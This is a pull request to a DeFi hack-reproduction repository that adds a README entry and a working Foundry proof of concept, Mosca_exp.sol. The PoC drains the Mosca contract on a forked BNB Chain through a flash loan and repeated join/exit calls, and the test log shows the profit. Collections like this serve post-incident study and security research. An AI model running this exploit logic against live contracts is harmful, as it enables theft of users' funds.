### PR TITLE
feat: add mosca attack incident

### DIFF
--- a/README.md
+++ b/README.md
@@ -48,6 +48,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20250106 Mosca](#20250106-mosca---logic-flaw)
 [20250107 IPC](#20250107-IPC---Incorrect-burn-pairs)
 
 [20250104 SorStaking](#20250104-SorStaking---Incorrect-reward-calculation)
@@ -1177,6 +1178,25 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ---
 
 ### List of DeFi Hacks & POCs
+
+
+
+
+### 20250106 Mosca - Logic Flaw
+
+### Lost: 19K
+
+
+```sh
+forge test --contracts ./src/test/2025-01/Mosca_exp.sol -vvv --evm-version shanghai
+```
+#### Contract
+[Mosca_exp.sol](src/test/2025-01/Mosca_exp.sol)
+### Link reference
+
+https://x.com/0xNickLFranklin/status/1876884383736430821
+
+---
 
 ### 20250107 IPC Incorrect burn pairs
 

--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 **Reproduce DeFi hack incidents using Foundry.**
 
-546 incidents included.
+547 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 
@@ -49,6 +49,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 
 ## List of Past DeFi Incidents
 [20250106 Mosca](#20250106-mosca---logic-flaw)
+
 [20250107 IPC](#20250107-IPC---Incorrect-burn-pairs)
 
 [20250104 SorStaking](#20250104-SorStaking---Incorrect-reward-calculation)

--- a/README.md
+++ b/README.md
@@ -48,9 +48,10 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
-[20250106 Mosca](#20250106-mosca---logic-flaw)
 
 [20250107 IPC](#20250107-IPC---Incorrect-burn-pairs)
+
+[20250106 Mosca](#20250106-mosca---logic-flaw)
 
 [20250104 SorStaking](#20250104-SorStaking---Incorrect-reward-calculation)
 
@@ -1180,8 +1181,20 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 
 ### List of DeFi Hacks & POCs
 
+### 20250107 IPC Incorrect burn pairs
 
+### Lost: ～590k USDT
 
+```sh
+forge test --contracts ./src/test/2025-01/IPC_exp.sol  -vvv --evm-version cancun
+```
+#### Contract
+[IPC_exp.sol](src/test/2025-01/IPC_exp.sol)
+### Link reference
+
+https://x.com/TenArmorAlert/status/1876663900663370056
+
+---
 
 ### 20250106 Mosca - Logic Flaw
 
@@ -1198,22 +1211,6 @@ forge test --contracts ./src/test/2025-01/Mosca_exp.sol -vvv --evm-version shang
 https://x.com/0xNickLFranklin/status/1876884383736430821
 
 ---
-
-### 20250107 IPC Incorrect burn pairs
-
-### Lost: ～590k USDT
-
-```sh
-forge test --contracts ./src/test/2025-01/IPC_exp.sol  -vvv --evm-version cancun
-```
-#### Contract
-[IPC_exp.sol](src/test/2025-01/IPC_exp.sol)
-### Link reference
-
-https://x.com/TenArmorAlert/status/1876663900663370056
-
----
-
 
 ### 20250104 SorStaking - Incorrect reward calculation
 

--- a/src/test/2025-01/Mosca_exp.sol
+++ b/src/test/2025-01/Mosca_exp.sol
@@ -1,0 +1,74 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.15;
+
+import "../basetest.sol";
+
+// @KeyInfo - Total Lost : 19K
+// Attacker : https://bscscan.com/address/0xb7d7240c207e094a9be802c0f370528a9c39fed5
+// Attack Contract : https://bscscan.com/address/0x851288dcfb39330291015c82a5a93721cc92507a
+// Vulnerable Contract : https://bscscan.com/address/0x1962b3356122d6a56f978e112d14f5e23a25037d
+// Attack Tx : https://bscscan.com/tx/0x4e5bb7e3f552f5ee6ee97db9a9fcf07287aae9a1974e24999690855741121aff
+
+// @Info
+// Vulnerable Contract Code : https://bscscan.com/address/0x1962b3356122d6a56f978e112d14f5e23a25037d#code
+
+// @Analysis
+// Post-mortem : https://nickfranklin.site/2025/01/08/mosca-hacked/
+// Twitter Guy : 
+// Hacking God : 
+pragma solidity ^0.8.0;
+
+import "../interface.sol";
+
+interface IMosca {
+    function join(uint256 amount, uint256 _refCode, uint8 fiat, bool enterpriseJoin) external;
+    function buy(uint256 amount, bool buyFiat, uint8 fiat) external;
+    function exitProgram() external;
+}
+
+
+contract Mosca is BaseTestWithBalanceLog {
+    uint256 blocknumToForkFrom = 45_519_929;
+
+    address internal constant USDC = 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d;
+    address internal constant MOSCA = 0x1962b3356122d6A56f978e112d14f5E23a25037D;
+    address internal constant PancakePool = 0x92b7807bF19b7DDdf89b706143896d05228f3121;
+
+
+    function setUp() public {
+        vm.createSelectFork("bsc", blocknumToForkFrom);
+        deal(USDC, address(this), 30_000_000_000_000_000_000);
+        fundingToken = address(USDC);
+    }
+
+    function testExploit() public balanceLog {
+        IERC20(USDC).approve(MOSCA, type(uint256).max);
+
+        uint256 amount = 30_000_000_000_000_000_000;
+        uint256 refCode = 0;
+        uint8 fiat = 2;
+        bool enterpriseJoin = false;
+        IMosca(MOSCA).join(amount, refCode, fiat, enterpriseJoin);
+
+        address recipient = address(this);
+        uint256 amount0 = 0;
+        uint256 amount1 = 1_000_000_000_000_000_000_000;
+        bytes memory data = abi.encode(amount1);
+        IPancakeV3Pool(PancakePool).flash(recipient, amount0, amount1, data);
+    }
+
+    function pancakeV3FlashCallback(uint256 fee0, uint256 fee1, bytes memory data) external {
+        (uint256 amount) = abi.decode(data, (uint256));
+        IMosca(MOSCA).buy(amount, true, 2);
+        IMosca(MOSCA).exitProgram();
+        
+        uint256 joinAmount = 30_000_000_000_000_000_000;
+        
+        for(uint256 i=0;i<20;i++) {
+            IMosca(MOSCA).join(joinAmount, 0, 2, false);
+            IMosca(MOSCA).exitProgram();
+        }
+
+        IERC20(USDC).transfer(msg.sender, amount+fee1);
+    }
+}


### PR DESCRIPTION
```
Ran 1 test for src/test/2025-01/Mosca_exp.sol:Mosca
[PASS] testExploit() (gas: 3603938)
Logs:
  Attacker USDC Balance Before exploit: 30.000000000000000000
  Attacker USDC Balance After exploit: 11228.018226600985221667

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.33s (13.96ms CPU time)

Ran 2 test suites in 2.34s (4.43s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
```